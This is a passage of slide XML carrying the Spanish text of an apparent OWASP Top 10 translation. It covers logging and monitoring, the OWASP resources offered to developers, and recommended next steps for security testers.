                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El registro y monitoreo insuficientes es la base de casi todos los grandes y mayores incidentes de seguridad.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes dependen de la falta de monitoreo y respuesta oportuna para lograr sus objetivos sin ser detectados.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Este punto se incluye en el Top 10 basado en la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>encuesta a la industria</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Una estrategia para determinar si usted no posee suficiente monitoreo es examinar los registros después de las pruebas de penetración.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Las acciones de los evaluadores deben registrarse lo suficiente como para comprender los daños que podrían haber causado.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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es-AR" sz="880" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los ataques más exitosos comienzan con la exploración de vulnerabilidades. Permitir que el sondeo de vulnerabilidades continúe puede aumentar la probabilidad de una explotación exitosa. En 2016, la identificación de brechas tardó una </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>media de 191 días</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="880" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, un tiempo más que suficiente para infligir daño.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="88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78845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r>
                        <a:rPr lang="es-AR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Establezca y utilice procesos de seguridad repetibles y controles estándar de seguridad</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Independientemente de si usted es nuevo en la seguridad de aplicaciones web o ya está familiarizado con estos riesgos, la tarea de producir una aplicación web segura o arreglar una ya existente puede ser difícil. Si debe gestionar una gran cartera de aplicaciones, esta tarea puede resultar desalentadora.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Para ayudar a organizaciones y desarrolladores a reducir los riesgos de seguridad de sus aplicaciones de un modo rentable, OWASP ha producido un gran número de recursos gratuitos y abiertos, que los puede utilizar para gestionar la seguridad de las aplicaciones en su organización. A continuación, se muestran algunos de los muchos recursos que OWASP ha producido para ayudar a las organizaciones a generar aplicaciones web y APIs seguras. En las páginas siguientes, presentamos recursos adiciones de OWASP que pueden ayudar a las organizaciones a verificar la seguridad de sus aplicaciones y APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hay un gran número de recursos adicionales OWASP disponibles para su uso. Por favor visite la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Página de Proyectos OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, que lista todos los proyectos “Insignia”, “Laboratorio” y en “Incubadora de OWASP”. La mayoría de los recursos están disponibles en nuestro </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, y muchos de los documentos pueden ser ordenados en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>papel o como eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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319511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58669" y="2949572"/>
              <a:ext cx="5540931" cy="810781"/>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105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="2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Para producir aplicaciones web seguras, se debe definir qué significa “seguro” para una aplicación en particular. OWASP recomienda utilizar el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7"/>
                </a:rPr>
                <a:t>Estándar de Verificación de Seguridad en Aplicaciones de OWASP (ASVS)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como una guía para ajustar los requisitos de seguridad de sus aplicaciones. Si el servicio es externo, vea el Anexo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8"/>
                </a:rPr>
                <a:t>Contrato de software seguro de OWASP</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="800" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Nota: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-AR" sz="800" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ese anexo toma en cuenta las leyes de los EE.UU. y por lo tanto se recomienda realizar las consultas legales correspondientes a cada país antes de utilizarlo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" kern="120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158400" y="2932907"/>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algn="ctr" defTabSz="444500">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>Requisitos de Seguridad en Aplicaciones</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1158669" y="3954621"/>
              <a:ext cx="5540931" cy="810781"/>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Es mucho más rentable diseñar la seguridad desde el principio y en todo el SDLC que añadir seguridad a sus aplicaciones y APIs.</a:t>
              </a:r>
            </a:p>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OWASP recomienda la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9"/>
                </a:rPr>
                <a:t>serie de hoja de trucos de prevención</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de prevención como puntos de inicio óptimos para guiarlo en el diseño seguro de aplicaciones.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158400" y="3942369"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Arquitectura de seguridad en aplicaciones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58669" y="4959670"/>
              <a:ext cx="5540931" cy="82744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Construir controles de seguridad fuertes y usables es difícil. Un conjunto de controles estándar de seguridad simplifican radicalmente el desarrollo de aplicaciones y APIs seguras.</a:t>
              </a:r>
            </a:p>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Los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10"/>
                </a:rPr>
                <a:t>controles proactivos de OWASP</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son un buen punto de inicio para desarrolladores, y muchos de los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frameworks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modernos incluyen controles estándares y efectivos para autorización, validación, prevención de CSRF,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58400" y="4962145"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Controles de Seguridad Estándar</a:t>
              </a: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58669" y="5981383"/>
              <a:ext cx="5540931" cy="821110"/>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Para mejorar el proceso que su organización utiliza para crear aplicaciones y APIs, OWASP recomienda el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11"/>
                </a:rPr>
                <a:t>Modelo de Garantía de la Madurez del Software (SAMM)</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Este modelo ayuda a las organizaciones a formular e implementar estrategias para el software seguro, adaptado a los riesgos específicos para su negocio y organización.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158400" y="5979462"/>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r>
                <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ciclo de vida de desarrollo seguro</a:t>
              </a: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58669" y="6996761"/>
              <a:ext cx="5540931" cy="82744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105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="880" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>El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2"/>
                </a:rPr>
                <a:t>proyecto educacional de OWASP</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proporciona material de formación para ayudar a educar a los desarrolladores en seguridad en aplicaciones web. Para una formación práctica acerca de vulnerabilidades, pruebe los proyectos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o el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Para mantenerse al día, asista a una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8"/>
                </a:rPr>
                <a:t>Conferencia AppSec de OWASP</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8"/>
                </a:rPr>
                <a:t>entrenamientos de OWASP</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 o a las </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-AR" sz="880" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>reuniones de los capítulos locales de OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-AR" sz="880" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="880" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="6996761"/>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r>
                <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Educación de la Seguridad en Aplicaciones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t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2600" dirty="0"/>
              <a:t>Próximos pasos para Desarrolladores</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="2600" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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142564413"/>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r>
                        <a:rPr lang="es-AR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Establecer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> revisiones continuas de seguridad de las aplicaciones</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Construir código de modo seguro es importante. </a:t>
                      </a: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Pero es crítico verificar que la seguridad que pretende construir está realmente presente, correctamente implementada, y es utilizada en todos los lugares donde se supone que debe serlo. El objetivo de la revisión de seguridad es proveer esta evidencia. El trabajo es difícil y complejo, y los procesos modernos de desarrollo a alta velocidad como Agile y DevOps han colocado una presión extrema en los enfoques y las herramientas tradicionales. Por lo tanto lo alentamos a pensar en cómo va a enfocarse en lo que es importante para su portafolio de aplicaciones, y hacerlo efectivo en términos de costo.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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Los riesgos modernos cambian rápidamente, así que los días de escanear o hacer un test de penetración a una aplicación para encontrar vulnerabilidades una vez al año han pasado hace tiempo. El desarrollo moderno de software requiere </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>revisión continua </a:t>
                      </a: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de seguridad de la aplicación a través de todo el ciclo de vida del desarrollo de software. Se debe analizar cómo mejorar los canales de desarrollo existentes automatizando la seguridad para que no retrase el desarrollo. Cualquiera sea el enfoque que elija, considere el costo anual de revisar, clasificar, remediar, revisar de nuevo, y volver a poner en producción una sola aplicación, multiplicado por la cantidad de aplicaciones.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t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2600" dirty="0"/>
              <a:t>Próximos pasos para Testers</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="2600"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152881" y="3518332"/>
            <a:ext cx="6546010" cy="5305097"/>
            <a:chOff x="152881" y="3144857"/>
            <a:chExt cx="6546010" cy="4897013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="3144857"/>
              <a:ext cx="5549303" cy="816967"/>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Antes de comenzar la revisión, asegúrese de comprender en qué es importante emplear el tiempo. Las prioridades vienen del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4"/>
                </a:rPr>
                <a:t>Modelado de Amenazas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así que si Ud. no tiene uno, necesita crearlo antes de la revisión.</a:t>
              </a:r>
            </a:p>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Considere usar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ASVS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y la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6"/>
                </a:rPr>
                <a:t>Guía de Revisión OWASP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como un insumo y no confíe en vendedores de herramientas para decidir qué es importante para su negocio</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152881" y="3150429"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="950" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Comprender el Modelo de Amenazas</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="95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159491"/>
              <a:ext cx="5549303" cy="83357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Su enfoque de la revisión de seguridad de aplicaciones debe ser altamente compatible con las personas, procesos y herramientas que usa en su SDLC. Intentos de forzar pasos, flujos de autorizaciones y revisiones extra probablemente causarán fricción, serán evitados y difíciles de superar. Busque oportunidades naturales para recabar información de seguridad y retroalimente su proceso con ella.</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152881" y="4171188"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Comprender su SDLC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="5200188"/>
              <a:ext cx="5549303" cy="820641"/>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105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="2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Escoja la técnica más simple, rápida y precisa para verificar cada requerimiento. El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7"/>
                </a:rPr>
                <a:t>Marco de Trabajo de Conocimiento de Seguridad de OWASP</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y el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5"/>
                </a:rPr>
                <a:t>Estándar de Verificación de Seguridad de Aplicaciones de OWASP (ASVS)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pueden ser buenas fuentes de requerimientos de seguridad funcionales y no funcionales en la revisión y en las pruebas de integración. Considere los recursos humanos requeridos para lidiar con falsos positivos provenientes del uso de herramientas automáticas, así como con los serios peligros de los falsos negativos.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52881" y="5196300"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="950" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Estrategias de pruebas</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="9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10934"/>
              <a:ext cx="5549303" cy="7982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110000"/>
                </a:lnSpc>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No comience por probarlo todo. Concéntrese en lo que es importante y amplíe su programa de verificación con el tiempo. Esto significa ampliar el conjunto de defensas y riesgos de seguridad que se prueban automáticamente, así como ampliar el conjunto de aplicaciones y APIs que se incluyen en el alcance. El objetivo es lograr un estado en el que la seguridad esencial de todas sus aplicaciones y API se verifique continuamente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152881" y="6205362"/>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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Lograr cobertura y precisión</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
